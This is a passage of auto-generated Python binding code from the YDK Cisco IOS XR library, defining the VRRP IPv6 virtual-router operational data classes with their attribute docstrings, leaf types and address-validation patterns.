**type**\: :py:class:`VrrpProtAuth <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpProtAuth>`
**config**\: False
.. attribute:: authentication_string
Authentication data
**type**\: str
**config**\: False
.. attribute:: configured_advertize_time
Configured advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: oper_advertize_time
Operational advertize time
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: min_delay_time
Minimum delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: reload_delay_time
Reload delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: delay_timer_flag
Delay timer running flag
**type**\: bool
**config**\: False
.. attribute:: delay_timer_secs
Delay timer running time secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: delay_timer_msecs
Delay timer running time msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: authentication_flag
Text authentication configured flag
**type**\: bool
**config**\: False
.. attribute:: force_timer_flag
Configured timers forced flag
**type**\: bool
**config**\: False
.. attribute:: preempt_flag
Preempt configured flag
**type**\: bool
**config**\: False
.. attribute:: ip_address_owner_flag
IP address owner flag
**type**\: bool
**config**\: False
.. attribute:: is_accept_mode
Is accept mode
**type**\: bool
**config**\: False
.. attribute:: preempt_delay_time
Preempt delay time
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: configured_priority
Configured priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_priority
Operational priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority_decrement
Priority decrement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_count
Number of items tracked
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_up_count
Number of tracked items up
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_count
Number of tracked items
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_up_count
Number of tracked items in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_in_current_state
Time in current state secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: state_change_count
Number of state changes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_vrouter_up
Time vrouter is up in centiseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: centisecond
.. attribute:: master_count
No. of times become Master
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_received_count
No. of advertisements received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advert_interval_error_count
Advertise interval errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_sent_count
No. of advertisements sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: authentication_fail_count
Authentication failures
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ttl_error_count
TTL errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_received_count
No. priority 0 received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_sent_count
No. priority 0 sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_count
Invalid packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address_list_error_count
Address list errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_auth_type_count
Invalid authentication type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_type_mismatch_count
Authentication type mismatches
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_length_errors_count
Packet length errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_stats_discontinuity
Time since a statistics discontinuity in ticks (10ns units)
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_state
BFD session state
**type**\: :py:class:`VrrpBfdSessionState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBfdSessionState>`
**config**\: False
.. attribute:: bfd_interval
BFD packet send interval
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_multiplier
BFD multiplier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_cfg_remote_ip
BFD configured remote IP
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bfd_configured_remote_ipv6_address
BFD configured remote IPv6
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state_from_checkpoint
Whether state recovered from checkpoint
**type**\: bool
**config**\: False
.. attribute:: interface_ipv4_address
The Interface Primary IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: interface_ipv6_address
The Interface linklocal IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: virtual_mac_address
Virtual mac address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
**config**\: False
.. attribute:: virtual_mac_address_state
Virtual mac address state
**type**\: :py:class:`VrrpVmacState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVmacState>`
**config**\: False
.. attribute:: operational_address
Operational IPv4 VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv4_configured_down_address
IPv4 Configured but Down VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_operational_address
IPv6 Operational VRRP addresses
**type**\: list of :py:class:`Ipv6OperationalAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress>`
**config**\: False
.. attribute:: ipv6_configured_down_address
IPv6 Configured but Down VRRP addresses
**type**\: list of :py:class:`Ipv6ConfiguredDownAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress>`
**config**\: False
.. attribute:: track_item_info
Track Item Info
**type**\: list of :py:class:`TrackItemInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo>`
**config**\: False
.. attribute:: state_change_history
State change history
**type**\: list of :py:class:`StateChangeHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter, self).__init__()
self.yang_name = "virtual-router"
self.yang_parent_name = "virtual-routers"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id']
self._child_classes = OrderedDict([("resign-sent-time", ("resign_sent_time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime)), ("resign-received-time", ("resign_received_time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime)), ("ipv6-operational-address", ("ipv6_operational_address", Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress)), ("ipv6-configured-down-address", ("ipv6_configured_down_address", Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress)), ("track-item-info", ("track_item_info", Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo)), ("state-change-history", ("state_change_history", Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('version', (YLeaf(YType.uint8, 'version'), ['int'])),
('address_family', (YLeaf(YType.enumeration, 'address-family'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('slaves', (YLeaf(YType.uint32, 'slaves'), ['int'])),
('is_slave', (YLeaf(YType.boolean, 'is-slave'), ['bool'])),
('followed_session_name', (YLeaf(YType.str, 'followed-session-name'), ['str'])),
('secondary_address_count', (YLeaf(YType.uint8, 'secondary-address-count'), ['int'])),
('operational_address_count', (YLeaf(YType.uint8, 'operational-address-count'), ['int'])),
('primary_virtual_ip', (YLeaf(YType.str, 'primary-virtual-ip'), ['str'])),
('configured_down_address_count', (YLeaf(YType.uint8, 'configured-down-address-count'), ['int'])),
('virtual_linklocal_ipv6_address', (YLeaf(YType.str, 'virtual-linklocal-ipv6-address'), ['str'])),
('primary_state', (YLeaf(YType.enumeration, 'primary-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVipState', '')])),
('master_ip_address', (YLeaf(YType.str, 'master-ip-address'), ['str'])),
('master_ipv6_address', (YLeaf(YType.str, 'master-ipv6-address'), ['str'])),
('master_priority', (YLeaf(YType.uint8, 'master-priority'), ['int'])),
('vrrp_state', (YLeaf(YType.enumeration, 'vrrp-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('authentication_type', (YLeaf(YType.enumeration, 'authentication-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpProtAuth', '')])),
('authentication_string', (YLeaf(YType.str, 'authentication-string'), ['str'])),
('configured_advertize_time', (YLeaf(YType.uint32, 'configured-advertize-time'), ['int'])),
('oper_advertize_time', (YLeaf(YType.uint32, 'oper-advertize-time'), ['int'])),
('min_delay_time', (YLeaf(YType.uint32, 'min-delay-time'), ['int'])),
('reload_delay_time', (YLeaf(YType.uint32, 'reload-delay-time'), ['int'])),
('delay_timer_flag', (YLeaf(YType.boolean, 'delay-timer-flag'), ['bool'])),
('delay_timer_secs', (YLeaf(YType.uint32, 'delay-timer-secs'), ['int'])),
('delay_timer_msecs', (YLeaf(YType.uint32, 'delay-timer-msecs'), ['int'])),
('authentication_flag', (YLeaf(YType.boolean, 'authentication-flag'), ['bool'])),
('force_timer_flag', (YLeaf(YType.boolean, 'force-timer-flag'), ['bool'])),
('preempt_flag', (YLeaf(YType.boolean, 'preempt-flag'), ['bool'])),
('ip_address_owner_flag', (YLeaf(YType.boolean, 'ip-address-owner-flag'), ['bool'])),
('is_accept_mode', (YLeaf(YType.boolean, 'is-accept-mode'), ['bool'])),
('preempt_delay_time', (YLeaf(YType.uint16, 'preempt-delay-time'), ['int'])),
('configured_priority', (YLeaf(YType.uint8, 'configured-priority'), ['int'])),
('operational_priority', (YLeaf(YType.uint8, 'operational-priority'), ['int'])),
('priority_decrement', (YLeaf(YType.uint32, 'priority-decrement'), ['int'])),
('tracked_interface_count', (YLeaf(YType.uint32, 'tracked-interface-count'), ['int'])),
('tracked_interface_up_count', (YLeaf(YType.uint32, 'tracked-interface-up-count'), ['int'])),
('tracked_item_count', (YLeaf(YType.uint32, 'tracked-item-count'), ['int'])),
('tracked_item_up_count', (YLeaf(YType.uint32, 'tracked-item-up-count'), ['int'])),
('time_in_current_state', (YLeaf(YType.uint32, 'time-in-current-state'), ['int'])),
('state_change_count', (YLeaf(YType.uint32, 'state-change-count'), ['int'])),
('time_vrouter_up', (YLeaf(YType.uint32, 'time-vrouter-up'), ['int'])),
('master_count', (YLeaf(YType.uint32, 'master-count'), ['int'])),
('adverts_received_count', (YLeaf(YType.uint32, 'adverts-received-count'), ['int'])),
('advert_interval_error_count', (YLeaf(YType.uint32, 'advert-interval-error-count'), ['int'])),
('adverts_sent_count', (YLeaf(YType.uint32, 'adverts-sent-count'), ['int'])),
('authentication_fail_count', (YLeaf(YType.uint32, 'authentication-fail-count'), ['int'])),
('ttl_error_count', (YLeaf(YType.uint32, 'ttl-error-count'), ['int'])),
('priority_zero_received_count', (YLeaf(YType.uint32, 'priority-zero-received-count'), ['int'])),
('priority_zero_sent_count', (YLeaf(YType.uint32, 'priority-zero-sent-count'), ['int'])),
('invalid_packet_count', (YLeaf(YType.uint32, 'invalid-packet-count'), ['int'])),
('address_list_error_count', (YLeaf(YType.uint32, 'address-list-error-count'), ['int'])),
('invalid_auth_type_count', (YLeaf(YType.uint32, 'invalid-auth-type-count'), ['int'])),
('auth_type_mismatch_count', (YLeaf(YType.uint32, 'auth-type-mismatch-count'), ['int'])),
('pkt_length_errors_count', (YLeaf(YType.uint32, 'pkt-length-errors-count'), ['int'])),
('time_stats_discontinuity', (YLeaf(YType.uint32, 'time-stats-discontinuity'), ['int'])),
('bfd_session_state', (YLeaf(YType.enumeration, 'bfd-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBfdSessionState', '')])),
('bfd_interval', (YLeaf(YType.uint32, 'bfd-interval'), ['int'])),
('bfd_multiplier', (YLeaf(YType.uint32, 'bfd-multiplier'), ['int'])),
('bfd_cfg_remote_ip', (YLeaf(YType.str, 'bfd-cfg-remote-ip'), ['str'])),
('bfd_configured_remote_ipv6_address', (YLeaf(YType.str, 'bfd-configured-remote-ipv6-address'), ['str'])),
('state_from_checkpoint', (YLeaf(YType.boolean, 'state-from-checkpoint'), ['bool'])),
('interface_ipv4_address', (YLeaf(YType.str, 'interface-ipv4-address'), ['str'])),
('interface_ipv6_address', (YLeaf(YType.str, 'interface-ipv6-address'), ['str'])),
('virtual_mac_address', (YLeaf(YType.str, 'virtual-mac-address'), ['str'])),
('virtual_mac_address_state', (YLeaf(YType.enumeration, 'virtual-mac-address-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVmacState', '')])),
('operational_address', (YLeafList(YType.str, 'operational-address'), ['str'])),
('ipv4_configured_down_address', (YLeafList(YType.str, 'ipv4-configured-down-address'), ['str'])),
])
self.interface_name = None
self.virtual_router_id = None
self.interface_name_xr = None
self.virtual_router_id_xr = None
self.version = None
self.address_family = None
self.session_name = None
self.slaves = None
self.is_slave = None
self.followed_session_name = None
self.secondary_address_count = None
self.operational_address_count = None
self.primary_virtual_ip = None
self.configured_down_address_count = None
self.virtual_linklocal_ipv6_address = None
self.primary_state = None
self.master_ip_address = None
self.master_ipv6_address = None
self.master_priority = None
self.vrrp_state = None
self.authentication_type = None
self.authentication_string = None
self.configured_advertize_time = None
self.oper_advertize_time = None
self.min_delay_time = None
self.reload_delay_time = None
self.delay_timer_flag = None
self.delay_timer_secs = None
self.delay_timer_msecs = None
self.authentication_flag = None
self.force_timer_flag = None
self.preempt_flag = None
self.ip_address_owner_flag = None
self.is_accept_mode = None
self.preempt_delay_time = None
self.configured_priority = None
self.operational_priority = None
self.priority_decrement = None
self.tracked_interface_count = None
self.tracked_interface_up_count = None
self.tracked_item_count = None
self.tracked_item_up_count = None
self.time_in_current_state = None
self.state_change_count = None
self.time_vrouter_up = None
self.master_count = None
self.adverts_received_count = None
self.advert_interval_error_count = None
self.adverts_sent_count = None
self.authentication_fail_count = None
self.ttl_error_count = None
self.priority_zero_received_count = None
self.priority_zero_sent_count = None
self.invalid_packet_count = None
self.address_list_error_count = None
self.invalid_auth_type_count = None
self.auth_type_mismatch_count = None
self.pkt_length_errors_count = None
self.time_stats_discontinuity = None
self.bfd_session_state = None
self.bfd_interval = None
self.bfd_multiplier = None
self.bfd_cfg_remote_ip = None
self.bfd_configured_remote_ipv6_address = None
self.state_from_checkpoint = None
self.interface_ipv4_address = None
self.interface_ipv6_address = None
self.virtual_mac_address = None
self.virtual_mac_address_state = None
self.operational_address = []
self.ipv4_configured_down_address = []
self.resign_sent_time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime()
self.resign_sent_time.parent = self
self._children_name_map["resign_sent_time"] = "resign-sent-time"
self.resign_received_time = Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime()
self.resign_received_time.parent = self
self._children_name_map["resign_received_time"] = "resign-received-time"
self.ipv6_operational_address = YList(self)
self.ipv6_configured_down_address = YList(self)
self.track_item_info = YList(self)
self.state_change_history = YList(self)
self._segment_path = lambda: "virtual-router" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv6/virtual-routers/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter, ['interface_name', 'virtual_router_id', 'interface_name_xr', 'virtual_router_id_xr', 'version', 'address_family', 'session_name', 'slaves', 'is_slave', 'followed_session_name', 'secondary_address_count', 'operational_address_count', 'primary_virtual_ip', 'configured_down_address_count', 'virtual_linklocal_ipv6_address', 'primary_state', 'master_ip_address', 'master_ipv6_address', 'master_priority', 'vrrp_state', 'authentication_type', 'authentication_string', 'configured_advertize_time', 'oper_advertize_time', 'min_delay_time', 'reload_delay_time', 'delay_timer_flag', 'delay_timer_secs', 'delay_timer_msecs', 'authentication_flag', 'force_timer_flag', 'preempt_flag', 'ip_address_owner_flag', 'is_accept_mode', 'preempt_delay_time', 'configured_priority', 'operational_priority', 'priority_decrement', 'tracked_interface_count', 'tracked_interface_up_count', 'tracked_item_count', 'tracked_item_up_count', 'time_in_current_state', 'state_change_count', 'time_vrouter_up', 'master_count', 'adverts_received_count', 'advert_interval_error_count', 'adverts_sent_count', 'authentication_fail_count', 'ttl_error_count', 'priority_zero_received_count', 'priority_zero_sent_count', 'invalid_packet_count', 'address_list_error_count', 'invalid_auth_type_count', 'auth_type_mismatch_count', 'pkt_length_errors_count', 'time_stats_discontinuity', 'bfd_session_state', 'bfd_interval', 'bfd_multiplier', 'bfd_cfg_remote_ip', 'bfd_configured_remote_ipv6_address', 'state_from_checkpoint', 'interface_ipv4_address', 'interface_ipv6_address', 'virtual_mac_address', 'virtual_mac_address_state', 'operational_address', 'ipv4_configured_down_address'], name, value)
class ResignSentTime(_Entity_):
"""
Time last resign was sent
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime, self).__init__()
self.yang_name = "resign-sent-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-sent-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignSentTime']['meta_info']
class ResignReceivedTime(_Entity_):
"""
Time last resign was received
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime, self).__init__()
self.yang_name = "resign-received-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-received-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.ResignReceivedTime']['meta_info']
class Ipv6OperationalAddress(_Entity_):
"""
IPv6 Operational VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, self).__init__()
self.yang_name = "ipv6-operational-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-operational-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6OperationalAddress']['meta_info']
class Ipv6ConfiguredDownAddress(_Entity_):
"""
IPv6 Configured but Down VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, self).__init__()
self.yang_name = "ipv6-configured-down-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-configured-down-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress']['meta_info']
class TrackItemInfo(_Entity_):
"""
Track Item Info
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo, self).__init__()
self.yang_name = "track-item-info"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo, ['interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv6.VirtualRouters.VirtualRouter.TrackItemInfo']['meta_info']
class StateChangeHistory(_Entity_):
"""
State change history
.. attribute:: time
Time of state change
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time>`
**config**\: False
.. attribute:: old_state
Old State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: new_state
New State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: reason
Reason for state change
**type**\: :py:class:`VrrpStateChangeReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpStateChangeReason>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory, self).__init__()
self.yang_name = "state-change-history"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("time", ("time", Vrrp.Ipv6.VirtualRouters.VirtualRouter.StateChangeHistory.Time))])
self._leafs = OrderedDict([
